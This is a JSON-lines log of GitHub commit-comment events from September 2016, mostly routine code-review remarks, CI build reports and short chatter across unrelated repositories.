{"id":"4552749897","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18994238,"position":null,"line":null,"path":null,"commit_id":"dbfbddffa35785137a43111c476c58998fa3bc4a","created_at":"2016-09-13T00:31:56Z","updated_at":"2016-09-13T00:31:56Z","body":"@JoinRajuncraftNow SPAM"}},"created_at":"2016-09-13T00:31:56Z"}
{"id":"4552753985","type":"CommitCommentEvent","actor":{"login":"shinjonathan"},"repo":{"name":"shinjonathan/jesque"},"payload":{"comment":{"id":18994244,"position":22,"line":276,"path":"src/main/java/net/greghaines/jesque/client/AbstractClient.java","commit_id":"fb141c9499a8b2226dd79c6cc6ba5ad0ce75fdc7","created_at":"2016-09-13T00:33:20Z","updated_at":"2016-09-13T00:33:20Z","body":"I believe Resque appends resque namespace to any keys. \r\n\r\nThis is what my Resque-scheduler tests actually generated.\r\n`\r\n127.0.0.1:6379> smembers \"resque:timestamps:{\\\"class\\\":\\\"intuitionJob\\\",\\\"args\\\":[235726],\\\"queue\\\":\\\"engine-test\\\"}\"\r\n1) \"delayed:1473717148\"\r\n2) \"delayed:1473717144\"\r\n`"}},"created_at":"2016-09-13T00:33:20Z"}
{"id":"4552754203","type":"CommitCommentEvent","actor":{"login":"joshmaker"},"repo":{"name":"lucianreynolds/MBPO_GeoRef_XL_Service"},"payload":{"comment":{"id":18994245,"position":17,"line":11,"path":"GeoServiceMBPO.py","commit_id":"b0b41b609a7c28307214689dd7b88538f8982d94","created_at":"2016-09-13T00:33:24Z","updated_at":"2016-09-13T00:33:24Z","body":"On this line, you are replacing spaces with `+` to make the string safe for a URL. There is a more robust way to do this by using a built Python function. First, add `from urllib import quote` to the top of your script. Then, modify the code sample from my previous comment to call `quote` on number and street before passing them into the format method:\r\n\r\n```Python\r\n    web_query = (\"https://api.cityofnewyork.us/geoclient/v1/\"\r\n                 \"address.json?houseNumber={number}\" \r\n                 \"&street={street}\"\r\n                 \"&borough=Manhattan\"\r\n                 \"&app_id=39eb3be5\"\r\n                 \"&app_key=mbpo19\").format(number=quote(number), street=quote(street))\r\n```\r\n\r\nThis will handle not only spaces but any other unexpected characters such as parentheses or slashes that might be your addresses."}},"created_at":"2016-09-13T00:33:24Z"}
{"id":"4552758751","type":"CommitCommentEvent","actor":{"login":"tloy1966"},"repo":{"name":"tloy1966/RealPrice"},"payload":{"comment":{"id":18994253,"position":null,"line":null,"path":null,"commit_id":"447aacff0b3caf26557e267f9a6ae0bfb995206a","created_at":"2016-09-13T00:35:00Z","updated_at":"2016-09-13T00:35:00Z","body":"To Do: \r\nInsert single row to check error"}},"created_at":"2016-09-13T00:35:00Z"}
{"id":"4552762178","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18994261,"position":null,"line":null,"path":null,"commit_id":"b0848810b71bda3b651589fec3003d63a31d0bcd","created_at":"2016-09-13T00:36:09Z","updated_at":"2016-09-13T00:36:09Z","body":"I made a script to spam every commit. HAHAHA (SORRY GARRETT)"}},"created_at":"2016-09-13T00:36:09Z"}
{"id":"4552764483","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18994272,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-13T00:36:56Z","updated_at":"2016-09-13T00:36:56Z","body":"Speaking of spam, HAHAHA"}},"created_at":"2016-09-13T00:36:56Z"}
{"id":"4552765869","type":"CommitCommentEvent","actor":{"login":"mermshaus"},"repo":{"name":"php-de/php-de.github.io"},"payload":{"comment":{"id":18994276,"position":null,"line":null,"path":null,"commit_id":"fdb126887deaa71ee5e73a4a12b57a8d035cb688","created_at":"2016-09-13T00:37:25Z","updated_at":"2016-09-13T00:37:25Z","body":"Grob so kann ein Mirror erzeugt werden:\r\n\r\n~~~ bash\r\n$ git clone https://github.com/php-de/php-de.github.io.git gittmp\r\n$ cd gittmp\r\n$ jekyll build\r\n$ rsync -avz _site user@webserver:/path/to/docroot\r\n~~~\r\n\r\nBeispiel: <http://phpwissen.ermshaus.org/>\r\n\r\nIch nehme an, das wird auch mit neueren jekyll- und kramdown-Versionen funktionieren. Mit den Versionen aus dem Repo von Ubuntu 14.04 bin ich da ja nicht mehr wirklich aktuell.\r\n\r\nEs ist meines Wissens nur ein hartkodierter Link auf php-de.github.io im Projekt. Das ist der Basis-URL für die Einträge des Atom-Feeds. Den könnte man aber in `_config.yml` ändern. Ansonsten dürfte ein Mirror vollständig unabhängig vom „Original“ sein."}},"created_at":"2016-09-13T00:37:25Z"}
{"id":"4552768717","type":"CommitCommentEvent","actor":{"login":"derobi"},"repo":{"name":"derobi/savethemblobs"},"payload":{"comment":{"id":18994283,"position":null,"line":null,"path":null,"commit_id":"d56c90526103b907be382b6d1ee0b362cd4bf328","created_at":"2016-09-13T00:38:26Z","updated_at":"2016-09-13T00:38:26Z","body":"add capability to save from a connected device"}},"created_at":"2016-09-13T00:38:26Z"}
{"id":"4552769509","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18994287,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-13T00:38:43Z","updated_at":"2016-09-13T00:38:43Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2332 of 2335 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T00:38:43Z"}
{"id":"4552776864","type":"CommitCommentEvent","actor":{"login":"JosephSilber"},"repo":{"name":"JosephSilber/bouncer"},"payload":{"comment":{"id":18994312,"position":null,"line":null,"path":null,"commit_id":"492982c40c6e7df88dc084872c3a99ee3acfcfe4","created_at":"2016-09-13T00:41:12Z","updated_at":"2016-09-13T00:41:12Z","body":"@SeoFood I'm really curious what you're using them for. Can you give me a real-world example from your project where you use the query scopes? \r\n"}},"created_at":"2016-09-13T00:41:12Z"}
{"id":"4552783454","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaStats/Feather.jl"},"payload":{"comment":{"id":18994338,"position":null,"line":null,"path":null,"commit_id":"25892aaf45eb96b4434467628785381295a7dda2","created_at":"2016-09-13T00:43:25Z","updated_at":"2016-09-13T00:43:25Z","body":"you should do this kind of messy travis-only stuff on a branch"}},"created_at":"2016-09-13T00:43:25Z"}
{"id":"4552787460","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaStats/Feather.jl"},"payload":{"comment":{"id":18994349,"position":4,"line":12,"path":".travis.yml","commit_id":"301b949232e231f7eaa5c2f45f294a8cb4aff4a1","created_at":"2016-09-13T00:44:51Z","updated_at":"2016-09-13T00:44:51Z","body":"travis doesn't support multiple language settings. it's just ignoring this"}},"created_at":"2016-09-13T00:44:51Z"}
{"id":"4552788929","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaStats/Feather.jl"},"payload":{"comment":{"id":18994357,"position":null,"line":null,"path":null,"commit_id":"25892aaf45eb96b4434467628785381295a7dda2","created_at":"2016-09-13T00:45:22Z","updated_at":"2016-09-13T00:45:22Z","body":"Yeah, that's a great idea. "}},"created_at":"2016-09-13T00:45:22Z"}
{"id":"4552790992","type":"CommitCommentEvent","actor":{"login":"KyleFung"},"repo":{"name":"KyleFung/azkaban"},"payload":{"comment":{"id":18994367,"position":27,"line":111,"path":"azkaban-webserver/src/restli/java/azkaban/restli/ProjectManagerResource.java","commit_id":"a00cf2bc1789c119d8770ab80a962149a3469da4","created_at":"2016-09-13T00:46:08Z","updated_at":"2016-09-13T00:46:08Z","body":"In ajaxHandleUpload (which handles the 'upload' action, not through Restli), a warning does not cause the upload to abort. Likewise, we should not abort the deploy action when a warning comes up.\r\n\r\nAs it is right now, throwing any kind of exception on warnings will abort the deploy. I think trying to figure out a way to modify the return JSON to include the warning messages is an ideal solution, but the code for deploy seems to need a bit of modification to achieve that."}},"created_at":"2016-09-13T00:46:08Z"}
{"id":"4552794703","type":"CommitCommentEvent","actor":{"login":"quinnj"},"repo":{"name":"JuliaStats/Feather.jl"},"payload":{"comment":{"id":18994377,"position":4,"line":12,"path":".travis.yml","commit_id":"301b949232e231f7eaa5c2f45f294a8cb4aff4a1","created_at":"2016-09-13T00:47:22Z","updated_at":"2016-09-13T00:47:22Z","body":"That makes sense why I was having a hard time calling the right version. I actually made some decent progress on doing a dockerized Travis build today, so I'll try to switch to that soon."}},"created_at":"2016-09-13T00:47:22Z"}
{"id":"4552800474","type":"CommitCommentEvent","actor":{"login":"TheAxeMan301"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18994398,"position":83,"line":83,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-13T00:49:22Z","updated_at":"2016-09-13T00:49:22Z","body":"I assume you are talking about consistency with the actual button's `disabled` flag. I had the same thought at first but changed my mind after realizing a few things:\r\n* The button's `disabled` flag is boolean that represents the actual state. Here we are giving a string that describes the behavior.\r\n* \"single\" and \"multi\" describe when the button is enabled, not disabled.\r\n* Making the schema for the config bar items the same as for the action bar items makes for simplicity and consistency at this level."}},"created_at":"2016-09-13T00:49:22Z"}
{"id":"4552801171","type":"CommitCommentEvent","actor":{"login":"purvaldur"},"repo":{"name":"purvaldur/discord-bot"},"payload":{"comment":{"id":18994402,"position":null,"line":null,"path":null,"commit_id":"77918fe43cf86334050335f7416a9f08d07582cd","created_at":"2016-09-13T00:49:37Z","updated_at":"2016-09-13T00:49:37Z","body":"Also, requested new token from RIOT..."}},"created_at":"2016-09-13T00:49:37Z"}
{"id":"4552805303","type":"CommitCommentEvent","actor":{"login":"DailyShana"},"repo":{"name":"Fluorohydride/ygopro-scripts"},"payload":{"comment":{"id":18994416,"position":11,"line":44,"path":"c99330325.lua","commit_id":"8ea2023cdf0cbbfb6ccd4fbd7ba8c88644a5e410","created_at":"2016-09-13T00:51:02Z","updated_at":"2016-09-13T00:51:02Z","body":"sorry"}},"created_at":"2016-09-13T00:51:02Z"}
{"id":"4552805614","type":"CommitCommentEvent","actor":{"login":"sndnvaps"},"repo":{"name":"multirom-aries/android_device_xiaomi_aries"},"payload":{"comment":{"id":18994419,"position":null,"line":null,"path":null,"commit_id":"6ece8e7c198afe8df5fe402eff35e98109a94677","created_at":"2016-09-13T00:51:09Z","updated_at":"2016-09-13T00:51:09Z","body":"@akorshun @werty100 \r\nhttps://github.com/CyanogenMod/android_frameworks_av/blob/fbef511c958b5f1b3e015d032dcac4ed7cc84876/services/audiopolicy/common/managerdefinitions/include/AudioInputDescriptor.h\r\n\r\nin this change , i found msession is vector . but in N branch , msession is private element .. \r\nlol\r\n"}},"created_at":"2016-09-13T00:51:09Z"}
{"id":"4552807688","type":"CommitCommentEvent","actor":{"login":"edilmigu"},"repo":{"name":"rpvi00/ACC4"},"payload":{"comment":{"id":18994427,"position":10,"line":23,"path":"ITP/src/Area.java","commit_id":"fb9ba94d3f29483808ccf683407d7b1cc9a43c86","created_at":"2016-09-13T00:51:51Z","updated_at":"2016-09-13T00:51:51Z","body":"I forgot the \"n\" in my new variable name called \"newLength\"...."}},"created_at":"2016-09-13T00:51:51Z"}
{"id":"4552809915","type":"CommitCommentEvent","actor":{"login":"TheAxeMan301"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18994438,"position":64,"line":64,"path":"object-browser-config-example.js","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-13T00:52:34Z","updated_at":"2016-09-13T00:52:34Z","body":"Yes, the schema does say single is the default here. However I think it is often a good idea to write out things like this explicitly, especially when you have other buttons using a different setting. It helps make for more self-documenting code. "}},"created_at":"2016-09-13T00:52:34Z"}
{"id":"4552809920","type":"CommitCommentEvent","actor":{"login":"JobroniCodes"},"repo":{"name":"JobroniCodes/TrueRandomNumberGenerator"},"payload":{"comment":{"id":18994439,"position":null,"line":null,"path":null,"commit_id":"1bf9d861e8623bef2609eba16ba7e4b87017d3b4","created_at":"2016-09-13T00:52:34Z","updated_at":"2016-09-13T00:52:34Z","body":"Initial Commit"}},"created_at":"2016-09-13T00:52:34Z"}
{"id":"4552818714","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18994454,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T00:55:36Z","updated_at":"2016-09-13T00:55:36Z","body":"There is no intention, or need for anything more then this.\r\nI was even debating on making it lighter by removing the can functions. \r\nAll actual implementation details are left to the modders. \r\nThis is purely just a 'do you have energy?' 'give me energy'\r\nWe don't care how its transfered, how it's generated, if its lossy, if its harmful, this is ALL on the modders.\r\nThis has no user facing name, so modders can do whatever they want, skin it however they want for the player, and just make everything work together."}},"created_at":"2016-09-13T00:55:36Z"}
{"id":"4552821005","type":"CommitCommentEvent","actor":{"login":"TheAxeMan301"},"repo":{"name":"ciena-frost/frost-rfcs"},"payload":{"comment":{"id":18994460,"position":7,"line":7,"path":"object-browser-example.hbs","commit_id":"3946f698cddd149714c42154ee255ab178d5dfd3","created_at":"2016-09-13T00:56:18Z","updated_at":"2016-09-13T00:56:18Z","body":"Honestly the reasoning here is that I really think we should keep the templates as simple as possible. Javascript is just so much easier to work with. "}},"created_at":"2016-09-13T00:56:18Z"}
{"id":"4552822366","type":"CommitCommentEvent","actor":{"login":"hyperreality"},"repo":{"name":"meanjs/mean"},"payload":{"comment":{"id":18994466,"position":null,"line":null,"path":null,"commit_id":"4f3a501063cf6023c1cc93007e786be54cf763b7","created_at":"2016-09-13T00:56:47Z","updated_at":"2016-09-13T00:56:47Z","body":"@wansco Great stuff, I'm keen to review it when it's done."}},"created_at":"2016-09-13T00:56:47Z"}
{"id":"4552822937","type":"CommitCommentEvent","actor":{"login":"alanmassuia"},"repo":{"name":"alanmassuia/Aula-fae"},"payload":{"comment":{"id":18994467,"position":null,"line":null,"path":null,"commit_id":"cd29dd60e1fc1dc554ba7083bfdabfffc69abf15","created_at":"2016-09-13T00:56:59Z","updated_at":"2016-09-13T00:56:59Z","body":"Primeiro teste"}},"created_at":"2016-09-13T00:56:59Z"}
{"id":"4552822972","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18994468,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-13T00:56:59Z","updated_at":"2016-09-13T00:56:59Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-13T00:56:59Z"}
{"id":"4552825503","type":"CommitCommentEvent","actor":{"login":"nickdos"},"repo":{"name":"AtlasOfLivingAustralia/biocache-hubs"},"payload":{"comment":{"id":18994475,"position":null,"line":null,"path":null,"commit_id":"4eb38a1f3c72f962df9afc63838bc22342203bcd","created_at":"2016-09-13T00:57:52Z","updated_at":"2016-09-13T00:57:52Z","body":"Can we revert this change, as it broke the ala-hub. The problem is the ala-hub uses the `ala-bootstrap2` plugin, which also has a `bootstrap` declaration and now this version is clobbering it. I could change the `ala-bootstrap2` version but a lot of apps use it so there is a greater chance of stuffing other apps up..."}},"created_at":"2016-09-13T00:57:52Z"}
{"id":"4552825830","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18994476,"position":null,"line":null,"path":null,"commit_id":"6f42046d7d456227da7f77a6b13dbb8b26fd72d8","created_at":"2016-09-13T00:57:59Z","updated_at":"2016-09-13T00:57:59Z","body":"#4262-Cooling-Towers-are-not-being-sequentially-loaded,-all-towers-are-running (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-6f42046d7d456227da7f77a6b13dbb8b26fd72d8-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T00:57:59Z"}
{"id":"4552827693","type":"CommitCommentEvent","actor":{"login":"CodingHare"},"repo":{"name":"CodingHare/MOOC"},"payload":{"comment":{"id":18994479,"position":null,"line":null,"path":null,"commit_id":"7c45d05c98f5597d93c9ebaf52fd31c8be9a5860","created_at":"2016-09-13T00:58:37Z","updated_at":"2016-09-13T00:58:37Z","body":"test"}},"created_at":"2016-09-13T00:58:37Z"}
{"id":"4552829501","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":18994487,"position":null,"line":null,"path":null,"commit_id":"daa3e088eddfddef39e736a8902164d266f261d3","created_at":"2016-09-13T00:59:14Z","updated_at":"2016-09-13T00:59:14Z","body":"You can use lambdas **BUT** you have to use it in the form:\r\n```C++\r\nCallback callback( [] (const header_t& header, AbstractPacket& packet) {\r\n  // If you were expecting Ping...\r\n  Ping& ImExpectingPing = packet.getValue<Ping>();\r\n  return 0;\r\n});  \r\n```\r\n\r\nother wise you can also pass in C function pointers, which work well if you plan to specify the packet to:\r\n```C++\r\n// This is allowed.\r\nerror_t callFunc(const header_t& header, Ping& ping) {\r\n  return 0;\r\n}\r\n\r\nint main() {\r\n  Callback callback ( (callback_t) callFunc );\r\n  return 0;\r\n}\r\n```"}},"created_at":"2016-09-13T00:59:14Z"}
{"id":"4552830007","type":"CommitCommentEvent","actor":{"login":"kate1138"},"repo":{"name":"kate1138/dwbc"},"payload":{"comment":{"id":18994489,"position":4,"line":6,"path":"www/include/header.php","commit_id":"e91a9bf9d87e7a5b0e0dfc169525a117df393ffe","created_at":"2016-09-13T00:59:25Z","updated_at":"2016-09-13T00:59:25Z","body":"you can only place all page files in one directory now..."}},"created_at":"2016-09-13T00:59:25Z"}
{"id":"4552833945","type":"CommitCommentEvent","actor":{"login":"alefherrera"},"repo":{"name":"alefherrera/LAB20162G11"},"payload":{"comment":{"id":18994500,"position":null,"line":null,"path":null,"commit_id":"45a829fc3e36b3a35f04e5f99e1534cf761203da","created_at":"2016-09-13T01:00:46Z","updated_at":"2016-09-13T01:00:46Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;XaLyeHcZ&#x2F;33-pagina-web\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Página web</a>"}},"created_at":"2016-09-13T01:00:46Z"}
{"id":"4552834396","type":"CommitCommentEvent","actor":{"login":"YlseMartinez"},"repo":{"name":"YlseMartinez/HellowWord"},"payload":{"comment":{"id":18994501,"position":null,"line":null,"path":null,"commit_id":"d3e3112197357b1848a04d69b93eec8b85f8be73","created_at":"2016-09-13T01:00:56Z","updated_at":"2016-09-13T01:00:56Z","body":"estoy realizando un prueba"}},"created_at":"2016-09-13T01:00:56Z"}
{"id":"4552838888","type":"CommitCommentEvent","actor":{"login":"samrocketman"},"repo":{"name":"travis-ci/travis.rb"},"payload":{"comment":{"id":18994507,"position":12,"line":95,"path":"lib/travis/client/methods.rb","commit_id":"fac4e62024bb5b72fe81da867173598d84345b62","created_at":"2016-09-13T01:02:26Z","updated_at":"2016-09-13T01:02:26Z","body":"I came here hoping to learn more about linting.  Instead, I found a shitty post statement to an API endpoint.  \"open source\" indeed."}},"created_at":"2016-09-13T01:02:26Z"}
{"id":"4552839822","type":"CommitCommentEvent","actor":{"login":"alanmassuia"},"repo":{"name":"alanmassuia/Aula-fae"},"payload":{"comment":{"id":18994509,"position":null,"line":null,"path":null,"commit_id":"cd29dd60e1fc1dc554ba7083bfdabfffc69abf15","created_at":"2016-09-13T01:02:45Z","updated_at":"2016-09-13T01:02:45Z","body":"davilsondecastro@gmail.com"}},"created_at":"2016-09-13T01:02:45Z"}
{"id":"4552842076","type":"CommitCommentEvent","actor":{"login":"ambethia"},"repo":{"name":"ctscodes/sensei-sense"},"payload":{"comment":{"id":18994514,"position":5,"line":41,"path":"src/components/Game.js","commit_id":"2abfde599cbb132a75cfe2a8e0911142546b6001","created_at":"2016-09-13T01:03:31Z","updated_at":"2016-09-13T01:03:31Z","body":"😱 "}},"created_at":"2016-09-13T01:03:31Z"}
{"id":"4552844083","type":"CommitCommentEvent","actor":{"login":"alanmassuia"},"repo":{"name":"alanmassuia/Aula-fae"},"payload":{"comment":{"id":18994518,"position":null,"line":null,"path":null,"commit_id":"cd29dd60e1fc1dc554ba7083bfdabfffc69abf15","created_at":"2016-09-13T01:04:13Z","updated_at":"2016-09-13T01:04:13Z","body":"github.com/davilson\r\n"}},"created_at":"2016-09-13T01:04:13Z"}
{"id":"4552850392","type":"CommitCommentEvent","actor":{"login":"jowens"},"repo":{"name":"gunrock/gunrock"},"payload":{"comment":{"id":18994529,"position":null,"line":null,"path":null,"commit_id":"dfcbb601f969a568520de3ced050ff0167676105","created_at":"2016-09-13T01:06:07Z","updated_at":"2016-09-13T01:06:07Z","body":"Remember, you pushed this to dev_debug not pre-release."}},"created_at":"2016-09-13T01:06:07Z"}
{"id":"4552851337","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"radar-parlamentar/radar"},"payload":{"comment":{"id":18994531,"position":6,"line":15,"path":"radar_parlamentar/plenaria/views.py","commit_id":"291e78e832f94119cfd0621a369f64960c24d4a0","created_at":"2016-09-13T01:06:24Z","updated_at":"2016-09-13T01:06:24Z","body":"Concordo Léo.\r\nPor isso acabei de fazer um novo commit 373525ef3968c12404 para contemplar essa \"observação\". ;)"}},"created_at":"2016-09-13T01:06:24Z"}
{"id":"4552854010","type":"CommitCommentEvent","actor":{"login":"michaeljota"},"repo":{"name":"BrainsoftLtd/ng2-admin"},"payload":{"comment":{"id":18994540,"position":null,"line":null,"path":null,"commit_id":"b76bae21a6398f0af698a4f6c4d30a46532e1615","created_at":"2016-09-13T01:07:22Z","updated_at":"2016-09-13T01:07:22Z","body":"I think the best aproach to do this would be allowing some how the Angular2 to use the `remote` object of electron inside a Service. \r\n\r\nI'm really new to Electron, and maybe I'm being naive, but I think you can expose a promise in the main thread and called in Angular using `remote`"}},"created_at":"2016-09-13T01:07:22Z"}
{"id":"4552855736","type":"CommitCommentEvent","actor":{"login":"ramidzkh"},"repo":{"name":"Bssentials/Bssentials-2"},"payload":{"comment":{"id":18994545,"position":null,"line":null,"path":null,"commit_id":"fd537e6f7451000cb2a187d5bce6510b6b7a6360","created_at":"2016-09-13T01:07:58Z","updated_at":"2016-09-13T01:07:58Z","body":"Didn't you just copy this from [Bukkit's Contributing.md](https://github.com/Bukkit/Bukkit) and then changed \"Bukkit\" to \"Bssentials\"?"}},"created_at":"2016-09-13T01:07:58Z"}
{"id":"4552857307","type":"CommitCommentEvent","actor":{"login":"111pontes"},"repo":{"name":"111pontes/ydk-gen"},"payload":{"comment":{"id":18994551,"position":65,"line":49,"path":"sdk/python/README.rst","commit_id":"e5328ffabd434da062ffa380e15871010eca64d9","created_at":"2016-09-13T01:08:29Z","updated_at":"2016-09-13T01:08:29Z","body":"Thanks, fixed."}},"created_at":"2016-09-13T01:08:29Z"}
{"id":"4552858664","type":"CommitCommentEvent","actor":{"login":"Join-GitHub-Now"},"repo":{"name":"Join-GitHub-Now/Advanced-PHP-MVC-Blog-System"},"payload":{"comment":{"id":18994556,"position":null,"line":null,"path":null,"commit_id":"3a4ed4e7a8f895269947e6b7e6551a268a38a0aa","created_at":"2016-09-13T01:09:00Z","updated_at":"2016-09-13T01:09:00Z","body":"Updated the addToBindings function."}},"created_at":"2016-09-13T01:09:00Z"}
{"id":"4552858945","type":"CommitCommentEvent","actor":{"login":"dcnewman"},"repo":{"name":"jetty840/Sailfish-MightyBoardFirmware"},"payload":{"comment":{"id":18994557,"position":null,"line":null,"path":null,"commit_id":"7040951d3f217b0964bf3199a04568a0a7386aab","created_at":"2016-09-13T01:09:08Z","updated_at":"2016-09-13T01:09:08Z","body":"On 12/09/2016 4:22 PM, caall99 wrote:\n> Which toolchain will I have to use with this? 4.6.2/4.6.3 or dbavatar's recommended 4.9.2? How can I update to 4.9.2 without updating to the newest release (5.xxx)? Thanks\n\nI only use 4.6.2 or .3.\n\nDan\n\n"}},"created_at":"2016-09-13T01:09:08Z"}
{"id":"4552859088","type":"CommitCommentEvent","actor":{"login":"joshmaker"},"repo":{"name":"lucianreynolds/MBPO_GeoRef_XL_Service"},"payload":{"comment":{"id":18994560,"position":43,"line":36,"path":"GeoServiceMBPO.py","commit_id":"b0b41b609a7c28307214689dd7b88538f8982d94","created_at":"2016-09-13T01:09:11Z","updated_at":"2016-09-13T01:09:11Z","body":"It looks like you can iterate over the rows in the Excel sheet directly with `sheet.iter_rows()`. Normally you could just do `for row in sheet.iter_rows():` but because you want to skip the first row you would want to do something like:\r\n\r\n```python\r\nrows = sheet.iter_rows()\r\nnext(rows)  # We skip over the first row because it is just column titles\r\nfor row in rows:\r\n    address = row[7].value\r\n```"}},"created_at":"2016-09-13T01:09:11Z"}
{"id":"4552859526","type":"CommitCommentEvent","actor":{"login":"Jiwoopark0508"},"repo":{"name":"kixlab/kixlab.github.io"},"payload":{"comment":{"id":18994562,"position":null,"line":null,"path":null,"commit_id":"156a47428e56c1cbb85476b8bcaf67121f87ed8a","created_at":"2016-09-13T01:09:18Z","updated_at":"2016-09-13T01:09:18Z","body":"Schrodinger's DK revived"}},"created_at":"2016-09-13T01:09:18Z"}
{"id":"4552860358","type":"CommitCommentEvent","actor":{"login":"LifeGold"},"repo":{"name":"Virtual-Universe/Experimental-Viewer"},"payload":{"comment":{"id":18994564,"position":null,"line":null,"path":null,"commit_id":"5c01935ef25f9acce2346026853d1aaec952fdb0","created_at":"2016-09-13T01:09:33Z","updated_at":"2016-09-13T01:09:33Z","body":"We use as virtual Universe Grid , as well as all other servers connected to it. Problems that we have described in WhiteCoreSim was from a friend, he uses the WhiteCore server, and asked to inform them about the problem, we checked whether there are these errors and published them. Wanted to know about the version 1.0.3 I have tried to put it but I get an error SQLLite to MySQL and tried to run, he is now in working condition can it be used already?"}},"created_at":"2016-09-13T01:09:33Z"}
{"id":"4552861950","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18994569,"position":null,"line":null,"path":null,"commit_id":"5d3c27d6c4f3bf7bb452ff005934cb09f6d76700","created_at":"2016-09-13T01:10:07Z","updated_at":"2016-09-13T01:10:07Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d3c27d6c4f3bf7bb452ff005934cb09f6d76700-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T01:10:07Z"}
